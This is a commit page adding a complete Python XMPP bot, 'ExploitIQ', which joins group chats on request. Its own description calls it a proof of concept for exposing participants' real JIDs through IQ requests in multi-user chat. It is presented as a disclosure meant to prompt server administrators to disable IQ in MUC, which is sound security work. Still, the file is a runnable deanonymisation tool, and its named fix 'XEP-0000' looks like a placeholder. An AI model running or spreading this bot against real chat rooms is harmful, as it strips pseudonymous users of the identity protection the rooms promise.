Upload New File
This commit is contained in:
commit
5a6b5945dc
1 changed files with 124 additions and 0 deletions
124
iq_exploit.py
Normal file
124
iq_exploit.py
Normal file
|
@ -0,0 +1,124 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
# Name: ExploitIQ
|
||||||
|
# License: No license, Unlicensed, Public Domain.
|
||||||
|
|
||||||
|
from getpass import getpass
|
||||||
|
from argparse import ArgumentParser
|
||||||
|
import logging
|
||||||
|
import slixmpp
|
||||||
|
|
||||||
|
|
||||||
|
class ExploitIQ(slixmpp.ClientXMPP):
|
||||||
|
|
||||||
|
"""
|
||||||
|
ExploitIQ - Expose Full JID by MUC IQ.
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, jid, password):
|
||||||
|
slixmpp.ClientXMPP.__init__(self, jid, password)
|
||||||
|
self.add_event_handler("disco_info", self.discovery)
|
||||||
|
self.add_event_handler("groupchat_direct_invite", self.on_groupchat_direct_invite)
|
||||||
|
self.add_event_handler("groupchat_invite", self.on_groupchat_invite)
|
||||||
|
self.add_event_handler("message", self.process_message)
|
||||||
|
self.add_event_handler("session_start", self.start)
|
||||||
|
|
||||||
|
async def start(self, event):
|
||||||
|
self.command_list()
|
||||||
|
self.send_presence()
|
||||||
|
await self['xep_0115'].update_caps()
|
||||||
|
|
||||||
|
async def discovery(self, DiscoInfo):
|
||||||
|
jid = DiscoInfo['from']
|
||||||
|
await self['xep_0115'].update_caps(jid=jid)
|
||||||
|
|
||||||
|
def on_groupchat_invite(self, message):
|
||||||
|
jid = message['groupchat_invite']['jid']
|
||||||
|
self.plugin['xep_0045'].join_muc(jid, 'ExploitIQ')
|
||||||
|
|
||||||
|
def on_groupchat_direct_invite(self, message):
|
||||||
|
jid = message['groupchat_invite']['jid']
|
||||||
|
self.plugin['xep_0045'].join_muc(jid, 'ExploitIQ')
|
||||||
|
|
||||||
|
def process_message(self, message):
|
||||||
|
if message['type'] in ('chat', 'normal'):
|
||||||
|
message_text = " ".join(message['body'].split())
|
||||||
|
message_lowercase = message_text.lower()
|
||||||
|
match message_lowercase:
|
||||||
|
case _ if message_lowercase.startswith('join '):
|
||||||
|
jid = message_lowercase[5:]
|
||||||
|
self.plugin['xep_0045'].join_muc(jid, 'ExploitIQ')
|
||||||
|
case _:
|
||||||
|
message_body = ('Send: `join <jid>` (JID has to be of groupchat.')
|
||||||
|
message.reply(message_body).send()
|
||||||
|
|
||||||
|
def command_list(self):
|
||||||
|
self['xep_0050'].add_command(node='start',
|
||||||
|
name='Start',
|
||||||
|
handler=self._handle_start)
|
||||||
|
self['xep_0050'].add_command(node='about',
|
||||||
|
name='About',
|
||||||
|
handler=self._handle_about)
|
||||||
|
|
||||||
|
def _handle_start(self, iq, session):
|
||||||
|
jid = session['from'].bare
|
||||||
|
text_note = 'Is this you JID?\n{}'.format(jid)
|
||||||
|
session['notes'] = [['info', text_note]]
|
||||||
|
return session
|
||||||
|
|
||||||
|
def _handle_about(self, iq, session):
|
||||||
|
text_note = ('This software is a proof of concept to realize a '
|
||||||
|
'privacy risk that results from sending IQ in MUC, '
|
||||||
|
'which would allow exposure of participant JID.'
|
||||||
|
'\n\n'
|
||||||
|
'XMPP server administrators are encouraged to disable '
|
||||||
|
'IQ in MUC and implement XEP-0000 which is more secure.')
|
||||||
|
session['notes'] = [['info', text_note]]
|
||||||
|
return session
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
# Setup the command line arguments.
|
||||||
|
parser = ArgumentParser(description=ExploitIQ.__doc__)
|
||||||
|
|
||||||
|
# Output verbosity options.
|
||||||
|
parser.add_argument("-q", "--quiet", help="set logging to ERROR",
|
||||||
|
action="store_const", dest="loglevel",
|
||||||
|
const=logging.ERROR, default=logging.INFO)
|
||||||
|
parser.add_argument("-d", "--debug", help="set logging to DEBUG",
|
||||||
|
action="store_const", dest="loglevel",
|
||||||
|
const=logging.DEBUG, default=logging.INFO)
|
||||||
|
|
||||||
|
# JID and password options.
|
||||||
|
parser.add_argument("-j", "--jid", dest="jid",
|
||||||
|
help="JID to use")
|
||||||
|
parser.add_argument("-p", "--password", dest="password",
|
||||||
|
help="password to use")
|
||||||
|
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
# Setup logging.
|
||||||
|
logging.basicConfig(level=args.loglevel,
|
||||||
|
format='%(levelname)-8s %(message)s')
|
||||||
|
|
||||||
|
if args.jid is None:
|
||||||
|
args.jid = input("Username: ")
|
||||||
|
if args.password is None:
|
||||||
|
args.password = getpass("Password: ")
|
||||||
|
|
||||||
|
# Setup the bot and register plugins. Note that while plugins may
|
||||||
|
# have interdependencies, the order in which you register them does
|
||||||
|
# not matter.
|
||||||
|
xmpp = ExploitIQ(args.jid, args.password)
|
||||||
|
xmpp.register_plugin('xep_0030') # Service Discovery
|
||||||
|
xmpp.register_plugin('xep_0004') # Data Forms
|
||||||
|
xmpp.register_plugin('xep_0060') # Publish-Subscribe
|
||||||
|
xmpp.register_plugin('xep_0045') # Multi-User Chat
|
||||||
|
xmpp.register_plugin('xep_0050') # Ad-Hoc Commands
|
||||||
|
xmpp.register_plugin('xep_0115') # Entity Capabilities
|
||||||
|
xmpp.register_plugin('xep_0122') # Data Forms Validation
|
||||||
|
xmpp.register_plugin('xep_0199') # XMPP Ping
|
||||||
|
|
||||||
|
# Connect to the XMPP server and start processing XMPP stanzas.
|
||||||
|
xmpp.connect()
|
||||||
|
xmpp.process()
|
Loading…
Reference in a new issue